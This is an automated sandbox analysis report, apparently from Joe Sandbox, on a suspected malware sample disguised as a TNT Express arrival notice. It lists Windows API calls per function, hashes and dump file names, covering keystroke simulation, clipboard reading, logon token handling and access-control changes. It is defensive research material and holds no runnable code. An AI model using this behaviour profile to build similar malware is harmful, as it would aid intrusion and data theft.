Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e66d0f9058c1b66d06c205f8f1ea8de32e04ee513d7327d723d179cbb9c5f699
Instruction ID: 9b2c7cc1ce9af83c3c22f63b3215b42449ad56f6632838ead69ad7272501029c
Opcode Fuzzy Hash: e66d0f9058c1b66d06c205f8f1ea8de32e04ee513d7327d723d179cbb9c5f699
Instruction Fuzzy Hash: B8F01C71115751CFDB349F65D4A0E12B7F4FF14319310996EE5DAC2521CB31D884DB10

Function 008C2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C2DC4

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: e08b024e278acca6eedb5135db0960de9d74955c0d24d0c19ad1bf915533db6e
Instruction ID: 7fa612740477a94ce1646795652767f83bdbfc81e02488d11085232c355b5637
Opcode Fuzzy Hash: e08b024e278acca6eedb5135db0960de9d74955c0d24d0c19ad1bf915533db6e
Instruction Fuzzy Hash: 7FE0CD726042245FC710D2589C05FDA77EDEFC8790F040075FD09E7248DA70ED808651

Function 00932693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009326B5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 79034476a0b4d2991ae00e8c22deb63a1fee8144292fda2dd38955eb8c0336a5
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 8CE04FB0609B105FDF395B28A8627B677E8DF4A304F00086EF69BC2252E57268458A4E

Function 008C2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C3908

Part of subcall function 008CD730: GetInputState.USER32 ref: 008CD807

SetCurrentDirectoryW.KERNEL32(?), ref: 008C2B6B

Part of subcall function 008C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008C314E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 2a5fa645c40cde676e744696aec0c28dc87645dce62b64cb309527fb02e8fc23
Instruction ID: e87a435fc897a7dc8e6d99dace682dc663e453a72465678f09732196468d0286
Opcode Fuzzy Hash: 2a5fa645c40cde676e744696aec0c28dc87645dce62b64cb309527fb02e8fc23
Instruction Fuzzy Hash: 1EE04F6220434506CA04BB6D9856E7DA769FB99361F40553EF142C31B2CE34C9474253

Function 0090039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00900704,?,?,00000000,?,00900704,00000000,0000000C), ref: 009003B7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2714cb868735e91860e1bf55b93d705b2d593b54203aa1ed3f904e16298969db
Instruction ID: 0ff641eed02c3376be0087b49533aa8e140d777356417037510ce035d3a4e101
Opcode Fuzzy Hash: 2714cb868735e91860e1bf55b93d705b2d593b54203aa1ed3f904e16298969db
Instruction Fuzzy Hash: C1D06C3205420DBFDF028F85DD06EDA3BAAFB48714F014000BE1856020C732E821AB90

Function 008C1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008C1CBC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 64667698221ccc2bc27db72884dd5c8f65f7464698fade540cf5740b893b618b
Instruction ID: d3aabbadba43e373b1fd8f3deb8c8658a21886808d557deae852a35c4546fc33
Opcode Fuzzy Hash: 64667698221ccc2bc27db72884dd5c8f65f7464698fade540cf5740b893b618b
Instruction Fuzzy Hash: 8AC0487A2A8305AEE2148B98AC4AF107764A348B02F448002F609A96E393A22820FA51

Function 008DFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 008DFD1F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 565fc32d6f9335aa91a5a4e816200970e77344835a296302e4b2db62c8226e04
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: E531F274A00109DBC718CF59D480969FBA2FF49304B2487A6E90ACB756D731EED1EBC0

Function 008B22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 008B22B1

Memory Dump Source

Source File: 00000000.00000002.1371455675.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 0a220db62cfa4a957aea927dd99410b6456ce8d9dd0ced69642464ba3b544747
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 97E0BF7494010E9FDB00EFA4D54969E7BB4EF04301F100261FD01D2280D63099508A62

Non-executed Functions

Function 00959576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0095961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0095969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009596C9
SendMessageW.USER32 ref: 009596F2
GetKeyState.USER32(00000011), ref: 0095978B
GetKeyState.USER32(00000009), ref: 00959798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009597AE
GetKeyState.USER32(00000010), ref: 009597B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009597E9
SendMessageW.USER32 ref: 00959810
SendMessageW.USER32(?,00001030,?,00957E95), ref: 00959918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0095992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00959941
SetCapture.USER32(?), ref: 0095994A
ClientToScreen.USER32(?,?), ref: 009599AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009599BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009599D6
ReleaseCapture.USER32 ref: 009599E1
GetCursorPos.USER32(?), ref: 00959A19
ScreenToClient.USER32(?,?), ref: 00959A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00959A80
SendMessageW.USER32 ref: 00959AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00959AEB
SendMessageW.USER32 ref: 00959B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00959B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00959B4A
GetCursorPos.USER32(?), ref: 00959B68
ScreenToClient.USER32(?,?), ref: 00959B75
GetParent.USER32(?), ref: 00959B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00959BFA
SendMessageW.USER32 ref: 00959C2B
ClientToScreen.USER32(?,?), ref: 00959C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00959CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00959CDE
SendMessageW.USER32 ref: 00959D01
ClientToScreen.USER32(?,?), ref: 00959D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00959D82

Part of subcall function 008D9944: GetWindowLongW.USER32(?,000000EB), ref: 008D9952

GetWindowLongW.USER32(?,000000F0), ref: 00959E05

Strings

F, xrefs: 00959D07
@GUI_DRAGID, xrefs: 0095997D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 2ad0f7ff872bf42e54bb693f9c684b403d2b8772f7333c922f4f3e4910c18b82
Instruction ID: fdd7d3872a95c87d6e702f6b142f47e93e327a34d0c485579cddb1b5d8772880
Opcode Fuzzy Hash: 2ad0f7ff872bf42e54bb693f9c684b403d2b8772f7333c922f4f3e4910c18b82
Instruction Fuzzy Hash: 83429F70109301EFEB25CF2ACD44BAABBE9FF48315F140A19F999872A1D731D958EB41

Function 00954873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 009548F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00954908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00954927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0095494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0095495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0095497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 009549AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 009549D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00954A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00954A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00954A7E
IsMenu.USER32(?), ref: 00954A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00954AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00954B20
GetWindowLongW.USER32(?,000000F0), ref: 00954B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00954BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00954C82
wsprintfW.USER32 ref: 00954CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00954CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00954CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00954D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00954D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00954D5A

Strings

%d/%02d/%02d, xrefs: 00954CA8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: b9955299351af34283b9ae7e67b1b84076ef3a4bacb417dfbc32f7d66d58e7aa
Instruction ID: 18ab678443d5c5f6b96edbce5106833e7f51f1caf12f7fe8728ceb02f1bb0ccb
Opcode Fuzzy Hash: b9955299351af34283b9ae7e67b1b84076ef3a4bacb417dfbc32f7d66d58e7aa
Instruction Fuzzy Hash: 4812FF71600304AFEB648F2ACC49FAE7BF8EF4571AF104119F916DA2E1D7749A84DB50

Function 008DF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 008DF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0091F474
IsIconic.USER32(00000000), ref: 0091F47D
ShowWindow.USER32(00000000,00000009), ref: 0091F48A
SetForegroundWindow.USER32(00000000), ref: 0091F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0091F4AA
GetCurrentThreadId.KERNEL32 ref: 0091F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0091F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0091F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0091F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0091F4DE
SetForegroundWindow.USER32(00000000), ref: 0091F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0091F4F6
keybd_event.USER32(00000012,00000000), ref: 0091F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0091F50B
keybd_event.USER32(00000012,00000000), ref: 0091F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0091F519
keybd_event.USER32(00000012,00000000), ref: 0091F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0091F528
keybd_event.USER32(00000012,00000000), ref: 0091F52D
SetForegroundWindow.USER32(00000000), ref: 0091F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0091F557

Strings

Shell_TrayWnd, xrefs: 0091F46F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 47839b2dc1492f1e3fc196132dd4bfa73f514edc9844049ff4ca30a065bfdd31
Instruction ID: 43baedba909e7b9279e59767c9b9fe4b7712515f341ff2c8749d57adf345afb2
Opcode Fuzzy Hash: 47839b2dc1492f1e3fc196132dd4bfa73f514edc9844049ff4ca30a065bfdd31
Instruction Fuzzy Hash: B8318CB1B5431CBEEB216BB64C4AFBF7E6DEB44B51F100066FA00E61D1D6B05940BBA0

Function 00921201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 009216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092170D
Part of subcall function 009216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092173A
Part of subcall function 009216C3: GetLastError.KERNEL32 ref: 0092174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00921286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 009212A8
CloseHandle.KERNEL32(?), ref: 009212B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009212D1
GetProcessWindowStation.USER32 ref: 009212EA
SetProcessWindowStation.USER32(00000000), ref: 009212F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00921310

Part of subcall function 009210BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009211FC), ref: 009210D4
Part of subcall function 009210BF: CloseHandle.KERNEL32(?,?,009211FC), ref: 009210E9

Strings

, xrefs: 0092125A
default, xrefs: 0092130B
winsta0, xrefs: 009212CC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 5c832a9b72d07cc94d556e3a14a5bad5ba8fa11475b1ff4561aa6e599ffffc0b
Instruction ID: 920b66e37d31bb05c671e02013ee422a03e8be0b40493fe77363cfdfc6bb1c36
Opcode Fuzzy Hash: 5c832a9b72d07cc94d556e3a14a5bad5ba8fa11475b1ff4561aa6e599ffffc0b
Instruction Fuzzy Hash: CC81ACB1900319AFDF20AFA5EC49BEE7BBDEF04704F044129F915E62A4C7318A64DB60

Function 00920B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009210F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00921114
Part of subcall function 009210F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921120
Part of subcall function 009210F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 0092112F
Part of subcall function 009210F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00920B9B,?,?,?), ref: 00921136
Part of subcall function 009210F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00920BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00920C00
GetLengthSid.ADVAPI32(?), ref: 00920C17
GetAce.ADVAPI32(?,00000000,?), ref: 00920C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00920C6D
GetLengthSid.ADVAPI32(?), ref: 00920C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00920C8C
HeapAlloc.KERNEL32(00000000), ref: 00920C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00920CB4
CopySid.ADVAPI32(00000000), ref: 00920CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00920CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00920D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00920D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920D45
HeapFree.KERNEL32(00000000), ref: 00920D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920D55
HeapFree.KERNEL32(00000000), ref: 00920D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00920D65
HeapFree.KERNEL32(00000000), ref: 00920D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00920D78
HeapFree.KERNEL32(00000000), ref: 00920D7F

Part of subcall function 00921193: GetProcessHeap.KERNEL32(00000008,00920BB1,?,00000000,?,00920BB1,?), ref: 009211A1
Part of subcall function 00921193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00920BB1,?), ref: 009211A8
Part of subcall function 00921193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00920BB1,?), ref: 009211B7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: cb58745306221ca40d32b31e07f9ce3c122b2307e6e28a3328077dbb2524139b
Instruction ID: 943fe2b4c539cf38a13e1c575729bfe5e3287d0af7bd10550605835a6f4a9ce8
Opcode Fuzzy Hash: cb58745306221ca40d32b31e07f9ce3c122b2307e6e28a3328077dbb2524139b
Instruction Fuzzy Hash: 237176B290532AAFDF10DFA5EC44BAEBBBCAF44301F044115E914A7296D770AA05CFA0

Function 0093EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0095CC08), ref: 0093EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 0093EB37
GetClipboardData.USER32(0000000D), ref: 0093EB43
CloseClipboard.USER32 ref: 0093EB4F
GlobalLock.KERNEL32(00000000), ref: 0093EB87
CloseClipboard.USER32 ref: 0093EB91
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0093EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 0093EBC9
GetClipboardData.USER32(00000001), ref: 0093EBD1
GlobalLock.KERNEL32(00000000), ref: 0093EBE2
GlobalUnlock.KERNEL32(00000000,?), ref: 0093EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 0093EC38
GetClipboardData.USER32(0000000F), ref: 0093EC44
GlobalLock.KERNEL32(00000000), ref: 0093EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0093EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0093EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0093ECD2
GlobalUnlock.KERNEL32(00000000,?,?), ref: 0093ECF3
CountClipboardFormats.USER32 ref: 0093ED14
CloseClipboard.USER32 ref: 0093ED59

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

